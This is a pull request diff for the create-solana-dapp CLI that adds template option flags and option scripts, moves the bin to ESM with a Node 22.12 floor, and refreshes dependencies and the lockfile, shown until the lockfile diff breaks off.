### PR TITLE
feat(cli): run template option scripts (solana-foundation#266) 

### DIFF
--- a/.changeset/esm-bin-node-22-floor.md
+++ b/.changeset/esm-bin-node-22-floor.md
@@ -1,0 +1,10 @@
+---
+'create-solana-dapp': minor
+---
+
+Ship the CLI entry point as ESM and raise the Node floor to `>=22.12.0`. The published `bin` previously pointed at a
+CommonJS bundle that called `require()` on four ESM-only dependencies (`@clack/prompts`, `giget`, `is-in-ci`,
+`update-notifier`), which only resolved through Node's `require(esm)` support and therefore crashed with
+`ERR_REQUIRE_ESM` on Node 20.12 through 20.18. The bin is now `dist/bin/index.mjs` and the new floor guarantees
+`require(esm)` for the CommonJS library entry that is still published for `require('create-solana-dapp')` consumers.
+Node 20 reached end of life on 2026-04-30.

--- a/.changeset/export-template-schemas.md
+++ b/.changeset/export-template-schemas.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': minor
+---
+
+Export the template catalog and init script Zod schemas from the package root so external tooling can validate and generate templates against a single source of truth.

--- a/.changeset/package-manager-diagnostics.md
+++ b/.changeset/package-manager-diagnostics.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': patch
+---
+
+Clarify template package-manager availability errors and verbose diagnostics.

--- a/.changeset/recover-corrupt-template-archive.md
+++ b/.changeset/recover-corrupt-template-archive.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': patch
+---
+
+Recover from a corrupt cached template archive: retry the download once and, if it is still corrupt, explain which cache directory to clear instead of failing with a bare `ZlibError`

--- a/.changeset/refresh-cli-dependencies.md
+++ b/.changeset/refresh-cli-dependencies.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': patch
+---
+
+Require Node.js 20.12 or newer and refresh CLI runtime dependencies.

--- a/.changeset/remove-incompatible-package-manager.md
+++ b/.changeset/remove-incompatible-package-manager.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': patch
+---
+
+Remove the template's `packageManager` field before install when it does not match the effective package manager (template-configured package managers take precedence)

--- a/.changeset/rename-in-deprecate-paths.md
+++ b/.changeset/rename-in-deprecate-paths.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': minor
+---
+
+Accept `in` for rename entries in the init script and deprecate `paths`. Templates using `paths` keep working and now log a deprecation warning; support for `paths` is removed in the next major version. An entry must set exactly one of the two.

--- a/.changeset/template-first-prompt-order.md
+++ b/.changeset/template-first-prompt-order.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': minor
+---
+
+Select the template before entering the project name, and pre-fill the name with the template name.

--- a/.changeset/template-option-flags.md
+++ b/.changeset/template-option-flags.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': minor
+---
+
+Support template-defined boolean CLI flags with defaults, mutually exclusive groups, file replacements, and post-create instructions.

--- a/.changeset/template-option-run-script.md
+++ b/.changeset/template-option-run-script.md
@@ -1,0 +1,14 @@
+---
+'create-solana-dapp': minor
+---
+
+Support a `run` value on template options, naming a `package.json` script to run when the option is selected. The script
+runs with the selected package manager after the template is cloned and before dependencies are installed, so a script
+that trims `package.json` is reflected in the lockfile and `node_modules`. The value reaches a shell, so it is limited to
+letters, digits, whitespace and `. : @ / = , + - _`, which rules out shell metacharacters and quoted arguments.
+
+The init script and the selected options are now snapshotted directly after cloning instead of being read again during
+the init script, so unsupported flags fail before dependencies are installed and an option script that rewrites
+`package.json` cannot drop the renames and instructions the init script applies. A failing task now removes the target
+directory it created, and `error.log` is written next to that directory rather than inside it so it survives the
+cleanup.

--- a/.changeset/windows-lockfile-cleanup.md
+++ b/.changeset/windows-lockfile-cleanup.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': patch
+---
+
+Delete non-selected package-manager lockfiles without relying on a POSIX shell command.

--- a/.changeset/zod-v4-schemas.md
+++ b/.changeset/zod-v4-schemas.md
@@ -1,0 +1,5 @@
+---
+'create-solana-dapp': minor
+---
+
+Migrate the init script and `package.json` schemas off the `zod/v3` compatibility import so every exported schema is a native Zod 4 schema, and declare `zod` as an optional peer dependency so consumers share a single Zod instance with the package.

--- a/.changeset/zod-v4-schemas.md
+++ b/.changeset/zod-v4-schemas.md
@@ -2,4 +2,4 @@
 'create-solana-dapp': minor
 ---
 
-Migrate the init script and `package.json` schemas off the `zod/v3` compatibility import so every exported schema is a native Zod 4 schema, and declare `zod` as an optional peer dependency so consumers share a single Zod instance with the package.
+Migrate the init script and `package.json` schemas off the `zod/v3` compatibility import so every exported schema is a native Zod 4 schema.

--- a/.github/workflows/typescript-test.yml
+++ b/.github/workflows/typescript-test.yml
@@ -14,6 +14,7 @@ jobs:
     strategy:
       matrix:
         node:
+          - '22.12.0'
           - 'current'
           - 'lts/*'
 

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -108,7 +108,7 @@ In another terminal, move to the directory where you want to test the `create-so
 
 ```shell
 cd /tmp
-node ~/path/to/create-solana-dapp/dist/bin/index.cjs --help
+node ~/path/to/create-solana-dapp/dist/bin/index.mjs --help
 ```
 
 ### Committing Your Changes

--- a/Dockerfile
+++ b/Dockerfile
@@ -6,7 +6,7 @@ RUN apk add --no-cache bash git
 RUN echo "export PS1='\w # '" >> ~/.bashrc
 
 RUN corepack enable && corepack use pnpm@latest-10
-RUN echo "export CMD=\"node /workspace/dist/bin/index.cjs --pnpm --verbose\"" >> ~/.bashrc
+RUN echo "export CMD=\"node /workspace/dist/bin/index.mjs --pnpm --verbose\"" >> ~/.bashrc
 
 COPY csd.sh /usr/local/bin/csd
 

--- a/README.md
+++ b/README.md
@@ -106,6 +106,14 @@ in the project.
           },
         },
       },
+      // Passing `--reset-project` runs the template's own `reset-project` script.
+      "reset-project": {
+        "description": "Start from a blank app instead of the example code",
+        "group": "example",
+        "instructions": ["Edit app/index.tsx to start building."],
+        // A package.json script, optionally followed by arguments.
+        "run": "reset-project -- --yes",
+      },
     },
     // Check versions and give a warning if it's not installed or the version is lower
     "versions": {
@@ -127,6 +135,16 @@ pnpm create solana-dapp@latest my-inference-app \
 
 When no flag is passed for an option group, the group's default option is selected. Passing another option from that
 group, such as `--llamacpp`, replaces the default.
+
+An option can declare a `run` value naming a script in the template's `package.json`, optionally followed by arguments.
+The script runs with the selected package manager after the template is cloned and **before dependencies are
+installed**, so a script that trims `package.json` is reflected in the lockfile and `node_modules`, and any files it
+writes are still picked up by the rename step. The script must not prompt, since it runs without an interactive
+terminal. A non-zero exit aborts the run and removes the target directory.
+
+The value is limited to letters, digits, whitespace and `. : @ / = , + - _`. Shell metacharacters are rejected rather
+than escaped, which also means an argument cannot contain a space — put anything that needs quoting in the script
+itself.
 
 ## Contributing
 

--- a/README.md
+++ b/README.md
@@ -78,6 +78,34 @@ in the project.
     // Optional. If omitted, the default Solana skill is installed.
     // Set to [] to skip skill installation, or provide one or more skill repo URLs to replace the default.
     "skills": ["https://github.com/org/skill-repo"],
+    // Optional boolean CLI flags declared by this template.
+    "options": {
+      // `--ollama` is selected when no option in the "engine" group is passed.
+      "ollama": {
+        "default": true,
+        "description": "Configure the template for Ollama",
+        "group": "engine",
+        "instructions": ["Start Ollama"],
+        "rename": {
+          "__MODEL__": {
+            "to": "qwen3:0.6b",
+            "paths": ["request.json"],
+          },
+        },
+      },
+      // Passing `--llamacpp` replaces the default from the same group.
+      "llamacpp": {
+        "description": "Configure the template for llama.cpp",
+        "group": "engine",
+        "instructions": ["Start llama-server"],
+        "rename": {
+          "__MODEL__": {
+            "to": "local-model",
+            "paths": ["request.json"],
+          },
+        },
+      },
+    },
     // Check versions and give a warning if it's not installed or the version is lower
     "versions": {
       "adb": "33.0.0",
@@ -87,6 +115,17 @@ in the project.
   },
 }
 ```
+
+Pass template-defined options as boolean long flags when creating the project:
+
+```shell
+pnpm create solana-dapp@latest my-inference-app \
+  --template pay-gate-inference \
+  --ollama
+```
+
+When no flag is passed for an option group, the group's default option is selected. Passing another option from that
+group, such as `--llamacpp`, replaces the default.
 
 ## Contributing
 

--- a/README.md
+++ b/README.md
@@ -69,10 +69,11 @@ in the project.
     "rename": {
       // Rename every instance of counter
       "counter": {
+        // In the following paths. Was called 'paths', which is deprecated and
+        // is removed in the next major version.
+        "in": ["anchor", "src"],
         // With the name of the project
         "to": "{{name}}",
-        // In the following paths
-        "paths": ["anchor", "src"],
       },
     },
     // Optional. If omitted, the default Solana skill is installed.
@@ -88,8 +89,8 @@ in the project.
         "instructions": ["Start Ollama"],
         "rename": {
           "__MODEL__": {
+            "in": ["request.json"],
             "to": "qwen3:0.6b",
-            "paths": ["request.json"],
           },
         },
       },
@@ -100,8 +101,8 @@ in the project.
         "instructions": ["Start llama-server"],
         "rename": {
           "__MODEL__": {
+            "in": ["request.json"],
             "to": "local-model",
-            "paths": ["request.json"],
           },
         },
       },

--- a/README.md
+++ b/README.md
@@ -75,7 +75,7 @@ in the project.
         "paths": ["anchor", "src"],
       },
     },
-    // Optional. If omitted, the default Solana dev skill is installed.
+    // Optional. If omitted, the default Solana skill is installed.
     // Set to [] to skip skill installation, or provide one or more skill repo URLs to replace the default.
     "skills": ["https://github.com/org/skill-repo"],
     // Check versions and give a warning if it's not installed or the version is lower

--- a/csd.sh
+++ b/csd.sh
@@ -23,7 +23,7 @@
 # $ TAG=next csd
 #
 # Create an app using a local create-solana-dapp command. Run `pnpm build:watch` in the create-solana-dapp directory to watch for changes.
-# $ CMD="node $HOME/path/to/create-solana-dapp/dist/bin/index.cjs --pnpm" csd
+# $ CMD="node $HOME/path/to/create-solana-dapp/dist/bin/index.mjs --pnpm" csd
 #
 # Create an app using npx
 # $ CMD="npx -y create-solana-dapp@latest" csd

--- a/eslint.config.mjs
+++ b/eslint.config.mjs
@@ -5,11 +5,12 @@ import sort from 'eslint-plugin-sort'
 export default unjs(
   {
     ignores: [
-      // ignore paths
-      'coverage',
-      'dist',
-      'node_modules',
-      'tmp',
+      // ignore paths (the `**/` prefix is required to match at any depth, not just the repo root)
+      '**/.claude',
+      '**/coverage',
+      '**/dist',
+      '**/node_modules',
+      '**/tmp',
     ],
     markdown: {
       rules: {

--- a/package.json
+++ b/package.json
@@ -90,6 +90,14 @@
     "update-notifier": "7.3.1",
     "zod": "4.4.3"
   },
+  "peerDependencies": {
+    "zod": "^4"
+  },
+  "peerDependenciesMeta": {
+    "zod": {
+      "optional": true
+    }
+  },
   "contributors": [
     {
       "name": "Joe Caulfield",

--- a/package.json
+++ b/package.json
@@ -3,7 +3,7 @@
   "version": "4.8.5",
   "description": "The fastest way to create Solana apps",
   "engines": {
-    "node": ">=20.12.0"
+    "node": ">=22.12.0"
   },
   "repository": {
     "name": "solana-foundation/create-solana-dapp",
@@ -31,7 +31,7 @@
   "module": "./dist/index.mjs",
   "types": "./dist/index.d.ts",
   "bin": {
-    "create-solana-dapp": "./dist/bin/index.cjs"
+    "create-solana-dapp": "./dist/bin/index.mjs"
   },
   "files": [
     "dist"

--- a/package.json
+++ b/package.json
@@ -2,6 +2,9 @@
   "name": "create-solana-dapp",
   "version": "4.8.5",
   "description": "The fastest way to create Solana apps",
+  "engines": {
+    "node": ">=20.12.0"
+  },
   "repository": {
     "name": "solana-foundation/create-solana-dapp",
     "type": "git",
@@ -49,43 +52,43 @@
   },
   "devDependencies": {
     "@changesets/changelog-github": "^0.5.1",
-    "@changesets/cli": "^2.29.7",
+    "@changesets/cli": "^2.31.1",
     "@types/mock-fs": "^4.13.4",
     "@types/node": "^24.3.1",
     "@types/semver": "^7.7.1",
     "@types/update-notifier": "^6.0.8",
-    "@vitest/coverage-v8": "^3.2.4",
-    "automd": "^0.4.0",
-    "eslint": "^9.35.0",
+    "@vitest/coverage-v8": "^4.1.10",
+    "automd": "^0.4.3",
+    "eslint": "^9.39.5",
     "eslint-config-prettier": "^10.1.8",
     "eslint-config-unjs": "^0.5.0",
-    "eslint-plugin-prettier": "^5.5.4",
+    "eslint-plugin-prettier": "^5.5.6",
     "eslint-plugin-sort": "^4.0.0",
     "lefthook": "^1.12.4",
-    "memfs": "^4.39.0",
+    "memfs": "^4.64.0",
     "mock-fs": "^5.5.0",
-    "pkg-pr-new": "^0.0.59",
-    "prettier": "^3.6.2",
+    "pkg-pr-new": "^0.0.79",
+    "prettier": "^3.9.6",
     "publint": "0.3.21",
     "typescript": "^5.9.2",
     "unbuild": "^3.6.1",
-    "vitest": "^3.2.4"
+    "vitest": "^4.1.10"
   },
-  "packageManager": "pnpm@10.15.1",
+  "packageManager": "pnpm@10.34.5",
   "pnpm": {
     "onlyBuiltDependencies": [
       "lefthook"
     ]
   },
   "dependencies": {
-    "@clack/prompts": "0.7.0",
+    "@clack/prompts": "1.7.0",
     "commander": "14.0.0",
     "giget": "2.0.0",
     "is-in-ci": "2.0.0",
     "picocolors": "1.1.1",
-    "semver": "7.7.2",
+    "semver": "7.8.5",
     "update-notifier": "7.3.1",
-    "zod": "4.1.5"
+    "zod": "4.4.3"
   },
   "contributors": [
     {

--- a/package.json
+++ b/package.json
@@ -90,14 +90,6 @@
     "update-notifier": "7.3.1",
     "zod": "4.4.3"
   },
-  "peerDependencies": {
-    "zod": "^4"
-  },
-  "peerDependenciesMeta": {
-    "zod": {
-      "optional": true
-    }
-  },
   "contributors": [
     {
       "name": "Joe Caulfield",

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -9,8 +9,8 @@ importers:
   .:
     dependencies:
       '@clack/prompts':
-        specifier: 0.7.0
-        version: 0.7.0
+        specifier: 1.7.0
+        version: 1.7.0
       commander:
         specifier: 14.0.0
         version: 14.0.0
@@ -24,21 +24,21 @@ importers:
         specifier: 1.1.1
         version: 1.1.1
       semver:
-        specifier: 7.7.2
-        version: 7.7.2
+        specifier: 7.8.5
+        version: 7.8.5
       update-notifier:
         specifier: 7.3.1
         version: 7.3.1
       zod:
-        specifier: 4.1.5
-        version: 4.1.5
+        specifier: 4.4.3
+        version: 4.4.3
     devDependencies:
       '@changesets/changelog-github':
         specifier: ^0.5.1
         version: 0.5.1
       '@changesets/cli':
-        specifier: ^2.29.7
-        version: 2.29.7(@types/node@24.9.1)
+        specifier: ^2.31.1
+        version: 2.31.1(@types/node@24.9.1)
       '@types/mock-fs':
         specifier: ^4.13.4
         version: 4.13.4
@@ -52,41 +52,41 @@ importers:
         specifier: ^6.0.8
         version: 6.0.8
       '@vitest/coverage-v8':
-        specifier: ^3.2.4
-        version: 3.2.4(vitest@3.2.4(@types/node@24.9.1)(jiti@2.6.1))
+        specifier: ^4.1.10
+        version: 4.1.10(vitest@4.1.10)
       automd:
-        specifier: ^0.4.0
-        version: 0.4.2(magicast@0.3.5)
+        specifier: ^0.4.3
+        version: 0.4.3(magicast@0.5.3)
       eslint:
-        specifier: ^9.35.0
-        version: 9.38.0(jiti@2.6.1)
+        specifier: ^9.39.5
+        version: 9.39.5(jiti@2.6.1)
       eslint-config-prettier:
         specifier: ^10.1.8
-        version: 10.1.8(eslint@9.38.0(jiti@2.6.1))
+        version: 10.1.8(eslint@9.39.5(jiti@2.6.1))
       eslint-config-unjs:
         specifier: ^0.5.0
-        version: 0.5.0(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
+        version: 0.5.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
       eslint-plugin-prettier:
-        specifier: ^5.5.4
-        version: 5.5.4(eslint-config-prettier@10.1.8(eslint@9.38.0(jiti@2.6.1)))(eslint@9.38.0(jiti@2.6.1))(prettier@3.6.2)
+        specifier: ^5.5.6
+        version: 5.5.6(eslint-config-prettier@10.1.8(eslint@9.39.5(jiti@2.6.1)))(eslint@9.39.5(jiti@2.6.1))(prettier@3.9.6)
       eslint-plugin-sort:
         specifier: ^4.0.0
-        version: 4.0.0(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
+        version: 4.0.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
       lefthook:
         specifier: ^1.12.4
         version: 1.13.6
       memfs:
-        specifier: ^4.39.0
-        version: 4.49.0
+        specifier: ^4.64.0
+        version: 4.64.0(tslib@2.8.1)
       mock-fs:
         specifier: ^5.5.0
         version: 5.5.0
       pkg-pr-new:
-        specifier: ^0.0.59
-        version: 0.0.59
+        specifier: ^0.0.79
+        version: 0.0.79
       prettier:
-        specifier: ^3.6.2
-        version: 3.6.2
+        specifier: ^3.9.6
+        version: 3.9.6
       publint:
         specifier: 0.3.21
         version: 0.3.21
@@ -97,45 +97,29 @@ importers:
         specifier: ^3.6.1
         version: 3.6.1(typescript@5.9.3)
       vitest:
-        specifier: ^3.2.4
-        version: 3.2.4(@types/node@24.9.1)(jiti@2.6.1)
+        specifier: ^4.1.10
+        version: 4.1.10(@types/node@24.9.1)(@vitest/coverage-v8@4.1.10)(vite@6.4.3(@types/node@24.9.1)(jiti@2.6.1))
 
 packages:
-
-  '@actions/core@1.11.1':
-    resolution: {integrity: sha512-hXJCSrkwfA46Vd9Z3q4cpEpHB1rL5NG04+/rbqW9d3+CSvtB1tYe8UTpAlixa1vj0m/ULglfEK2UKxMGxCxv5A==}
-
-  '@actions/exec@1.1.1':
-    resolution: {integrity: sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==}
-
-  '@actions/http-client@2.2.3':
-    resolution: {integrity: sha512-mx8hyJi/hjFvbPokCg4uRd4ZX78t+YyRPtnKWwIl+RzNaVuFpQHfmlGVfsKEJN8LwTCvL+DfVgAM04XaHkm6bA==}
-
-  '@actions/io@1.1.3':
-    resolution: {integrity: sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==}
-
-  '@ampproject/remapping@2.3.0':
-    resolution: {integrity: sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==}
-    engines: {node: '>=6.0.0'}
 
   '@babel/code-frame@7.27.1':
     resolution: {integrity: sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==}
     engines: {node: '>=6.9.0'}
 
-  '@babel/helper-string-parser@7.25.9':
-    resolution: {integrity: sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==}
-    engines: {node: '>=6.9.0'}
-
-  '@babel/helper-validator-identifier@7.25.9':
-    resolution: {integrity: sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==}
+  '@babel/helper-string-parser@7.29.7':
+    resolution: {integrity: sha512-Pb5ijPrZ89GDH8223L4UP8i6QApWxs04RbPQJTeWDV0/keR2E36MeKnyr6LYmUUvqRRI+Iv87SuF1W6ErINzYw==}
     engines: {node: '>=6.9.0'}
 
   '@babel/helper-validator-identifier@7.27.1':
     resolution: {integrity: sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==}
     engines: {node: '>=6.9.0'}
 
-  '@babel/parser@7.26.8':
-    resolution: {integrity: sha512-TZIQ25pkSoaKEYYaHbbxkfL36GNsQ6iFiBbeuzAkLnXayKR1yP1zFe+NxuZWWsUyvt8icPU9CCq0sgWGXR1GEw==}
+  '@babel/helper-validator-identifier@7.29.7':
+    resolution: {integrity: sha512-qehxGkRj55h/ff8EMaJ+cYhyaKlHIxqYDn682wQD7RNp9UujOQsHog2uS0r2vzr4pW+sXf90NeeayjcNaX3fFg==}
+    engines: {node: '>=6.9.0'}
+
+  '@babel/parser@7.29.7':
+    resolution: {integrity: sha512-hnORnjP/1P/zFEndoeX+n+t1RwWRJiJpM/jO7FW32Kn9r5+sJB2JWOdYo4L6k78j15eCwY3Gm/7364B1EMwtNg==}
     engines: {node: '>=6.0.0'}
     hasBin: true
 
@@ -143,19 +127,19 @@ packages:
     resolution: {integrity: sha512-AOPI3D+a8dXnja+iwsUqGRjr1BbZIe771sXdapOtYI531gSqpi92vXivKcq2asu/DFpdl1ceFAKZyRzK2PCVcQ==}
     engines: {node: '>=6.9.0'}
 
-  '@babel/types@7.26.8':
-    resolution: {integrity: sha512-eUuWapzEGWFEpHFxgEaBG8e3n6S8L3MSu0oda755rOfabWPnh0Our1AozNFVUxGFIhbKgd1ksprsoDGMinTOTA==}
+  '@babel/types@7.29.7':
+    resolution: {integrity: sha512-4zBIxpPzowiZpusoFkyGVwakdRJUyuH5PxQ/PrqghfdFWWasvnCdPfQXHrenDai+gyLARulZjZowCOj6fjT4pA==}
     engines: {node: '>=6.9.0'}
 
   '@bcoe/v8-coverage@1.0.2':
     resolution: {integrity: sha512-6zABk/ECA/QYSCQ1NGiVwwbQerUCZ+TQbp64Q3AgmfNvurHH0j8TtXa1qbShXA6qqkpAj4V5W8pP6mLe1mcMqA==}
     engines: {node: '>=18'}
 
-  '@changesets/apply-release-plan@7.0.13':
-    resolution: {integrity: sha512-BIW7bofD2yAWoE8H4V40FikC+1nNFEKBisMECccS16W1rt6qqhNTBDmIw5HaqmMgtLNz9e7oiALiEUuKrQ4oHg==}
+  '@changesets/apply-release-plan@7.1.1':
+    resolution: {integrity: sha512-9qPCm/rLx/xoOFXIHGB229+4GOL76S4MC+7tyOuTsR6+1jYlfFDQORdvwR5hDA6y4FL2BPt3qpbcQIS+dW85LA==}
 
-  '@changesets/assemble-release-plan@6.0.9':
-    resolution: {integrity: sha512-tPgeeqCHIwNo8sypKlS3gOPmsS3wP0zHt67JDuL20P4QcXiw/O4Hl7oXiuLnP9yg+rXLQ2sScdV1Kkzde61iSQ==}
+  '@changesets/assemble-release-plan@6.0.10':
+    resolution: {integrity: sha512-rSDcqdJ9KbVyjpBIuCidhvZNIiVt1XaIYp73ycVQRIA5n/j6wQaEk0ChRLMUQ1vkxZe51PTQ9OIhbg6HQMW45A==}
 
   '@changesets/changelog-git@0.2.1':
     resolution: {integrity: sha512-x/xEleCFLH28c3bQeQIyeZf8lFXyDFVn1SgcBiR2Tw/r4IAWlk1fzxCEZ6NxQAjF2Nwtczoen3OA2qR+UawQ8Q==}
@@ -163,24 +147,24 @@ packages:
   '@changesets/changelog-github@0.5.1':
     resolution: {integrity: sha512-BVuHtF+hrhUScSoHnJwTELB4/INQxVFc+P/Qdt20BLiBFIHFJDDUaGsZw+8fQeJTRP5hJZrzpt3oZWh0G19rAQ==}
 
-  '@changesets/cli@2.29.7':
-    resolution: {integrity: sha512-R7RqWoaksyyKXbKXBTbT4REdy22yH81mcFK6sWtqSanxUCbUi9Uf+6aqxZtDQouIqPdem2W56CdxXgsxdq7FLQ==}
+  '@changesets/cli@2.31.1':
+    resolution: {integrity: sha512-uO05WTcRBwuVOJVSW8Cmpqw6q0WDL53ajGCMyszutvOe5toOnunbpM4jZzf+qxBOz7i0AzopZ8diBuewjmF40w==}
     hasBin: true
 
-  '@changesets/config@3.1.1':
-    resolution: {integrity: sha512-bd+3Ap2TKXxljCggI0mKPfzCQKeV/TU4yO2h2C6vAihIo8tzseAn2e7klSuiyYYXvgu53zMN1OeYMIQkaQoWnA==}
+  '@changesets/config@3.1.4':
+    resolution: {integrity: sha512-pf0bvD/v6WI2cRlZ6hzpjtZdSlXDXMAJ+Iz7xfFzV4ZxJ8OGGAON+1qYc99ZPrijnt4xp3VGG7eNvAOGS24V1Q==}
 
   '@changesets/errors@0.2.0':
     resolution: {integrity: sha512-6BLOQUscTpZeGljvyQXlWOItQyU71kCdGz7Pi8H8zdw6BI0g3m43iL4xKUVPWtG+qrrL9DTjpdn8eYuCQSRpow==}
 
-  '@changesets/get-dependents-graph@2.1.3':
-    resolution: {integrity: sha512-gphr+v0mv2I3Oxt19VdWRRUxq3sseyUpX9DaHpTUmLj92Y10AGy+XOtV+kbM6L/fDcpx7/ISDFK6T8A/P3lOdQ==}
+  '@changesets/get-dependents-graph@2.1.4':
+    resolution: {integrity: sha512-ZsS00x6WvmHq3sQv8oCMwL0f/z3wbXCVuSVTJwCnnmbC/iBdNJGFx1EcbMG4PC6sXRyH69liM4A2WKXzn/kRPg==}
 
   '@changesets/get-github-info@0.6.0':
     resolution: {integrity: sha512-v/TSnFVXI8vzX9/w3DU2Ol+UlTZcu3m0kXTjTT4KlAdwSvwutcByYwyYn9hwerPWfPkT2JfpoX0KgvCEi8Q/SA==}
 
-  '@changesets/get-release-plan@4.0.13':
-    resolution: {integrity: sha512-DWG1pus72FcNeXkM12tx+xtExyH/c9I1z+2aXlObH3i9YA7+WZEVaiHzHl03thpvAgWTRaH64MpfHxozfF7Dvg==}
+  '@changesets/get-release-plan@4.0.16':
+    resolution: {integrity: sha512-2K5Om6CrMPm45rtvckfzWo7e9jOVCKLCnXia5eUPaURH7/LWzri7pK1TycdzAuAtehLkW7VPbWLCSExTHmiI6g==}
 
   '@changesets/get-version-range-type@0.4.0':
     resolution: {integrity: sha512-hwawtob9DryoGTpixy1D3ZXbGgJu1Rhr+ySH2PvTLHvkZuQ7sRT4oQwMh0hbqZH1weAooedEjRsbrWcGLCeyVQ==}
@@ -191,14 +175,14 @@ packages:
   '@changesets/logger@0.1.1':
     resolution: {integrity: sha512-OQtR36ZlnuTxKqoW4Sv6x5YIhOmClRd5pWsjZsddYxpWs517R0HkyiefQPIytCVh4ZcC5x9XaG8KTdd5iRQUfg==}
 
-  '@changesets/parse@0.4.1':
-    resolution: {integrity: sha512-iwksMs5Bf/wUItfcg+OXrEpravm5rEd9Bf4oyIPL4kVTmJQ7PNDSd6MDYkpSJR1pn7tz/k8Zf2DhTCqX08Ou+Q==}
+  '@changesets/parse@0.4.3':
+    resolution: {integrity: sha512-ZDmNc53+dXdWEv7fqIUSgRQOLYoUom5Z40gmLgmATmYR9NbL6FJJHwakcCpzaeCy+1D0m0n7mT4jj2B/MQPl7A==}
 
   '@changesets/pre@2.0.2':
     resolution: {integrity: sha512-HaL/gEyFVvkf9KFg6484wR9s0qjAXlZ8qWPDkTyKF6+zqjBe/I2mygg3MbpZ++hdi0ToqNUF8cjj7fBy0dg8Ug==}
 
-  '@changesets/read@0.6.5':
-    resolution: {integrity: sha512-UPzNGhsSjHD3Veb0xO/MwvasGe8eMyNrR/sT9gR8Q3DhOQZirgKhhXv/8hVsI0QpPjR004Z9iFxoJU6in3uGMg==}
+  '@changesets/read@0.6.7':
+    resolution: {integrity: sha512-D1G4AUYGrBEk8vj8MGwf75k9GpN6XL3wg8i42P2jZZwFLXnlr2Pn7r9yuQNbaMCarP7ZQWNJbV6XLeysAIMhTA==}
 
   '@changesets/should-skip-package@0.1.2':
     resolution: {integrity: sha512-qAK/WrqWLNCP22UDdBTMPH5f41elVDlsNyat180A33dWxuUDyNpg6fPi/FyTZwRriVjg0L8gnjJn2F9XAoF0qw==}
@@ -212,19 +196,13 @@ packages:
   '@changesets/write@0.4.0':
     resolution: {integrity: sha512-CdTLvIOPiCNuH71pyDu3rA+Q0n65cmAbXnwWH84rKGiFumFzkmHNT8KHTMEchcxN+Kl8I54xGUhJ7l3E7X396Q==}
 
-  '@clack/core@0.3.5':
-    resolution: {integrity: sha512-5cfhQNH+1VQ2xLQlmzXMqUoiaH0lRBq9/CLW9lTyMbuKLC3+xEK01tHVvyut++mLOn5urSHmkm6I0Lg9MaJSTQ==}
+  '@clack/core@1.4.3':
+    resolution: {integrity: sha512-/kr3UWNtdJfxZtPgDqUOmG2pvwlmcLGheex5yiZKdwbzZJxhV+HMNR9QNmyY5cGwTNV6LrR7Jtp+KjhUAP1qBQ==}
+    engines: {node: '>= 20.12.0'}
 
-  '@clack/prompts@0.7.0':
-    resolution: {integrity: sha512-0MhX9/B4iL6Re04jPrttDm+BsP8y6mS7byuv0BvXgdXhbV5PdlsHt55dvNsuBCPZ7xq1oTAOOuotR9NFbQyMSA==}
-    bundledDependencies:
-      - is-unicode-supported
-
-  '@esbuild/aix-ppc64@0.24.2':
-    resolution: {integrity: sha512-thpVCb/rhxE/BnMLQ7GReQLLN8q9qbHmI55F4489/ByVg2aQaQ6kbcLb6FHkocZzQhxc4gx0sCk0tJkKBFzDhA==}
-    engines: {node: '>=18'}
-    cpu: [ppc64]
-    os: [aix]
+  '@clack/prompts@1.7.0':
+    resolution: {integrity: sha512-y7/yvZ2TPAnR9+jnc00klvNNLkJiXFFrQA/hlLCcxA9a2A4zQIOimyFQ9XfwYKiGD1fb5GY8vbKIIgO8d5Tb2A==}
+    engines: {node: '>= 20.12.0'}
 
   '@esbuild/aix-ppc64@0.25.11':
     resolution: {integrity: sha512-Xt1dOL13m8u0WE8iplx9Ibbm+hFAO0GsU2P34UNoDGvZYkY8ifSiy6Zuc1lYxfG7svWE2fzqCUmFp5HCn51gJg==}
@@ -232,22 +210,10 @@ packages:
     cpu: [ppc64]
     os: [aix]
 
-  '@esbuild/android-arm64@0.24.2':
-    resolution: {integrity: sha512-cNLgeqCqV8WxfcTIOeL4OAtSmL8JjcN6m09XIgro1Wi7cF4t/THaWEa7eL5CMoMBdjoHOTh/vwTO/o2TRXIyzg==}
-    engines: {node: '>=18'}
-    cpu: [arm64]
-    os: [android]
-
   '@esbuild/android-arm64@0.25.11':
     resolution: {integrity: sha512-9slpyFBc4FPPz48+f6jyiXOx/Y4v34TUeDDXJpZqAWQn/08lKGeD8aDp9TMn9jDz2CiEuHwfhRmGBvpnd/PWIQ==}
     engines: {node: '>=18'}
     cpu: [arm64]
-    os: [android]
-
-  '@esbuild/android-arm@0.24.2':
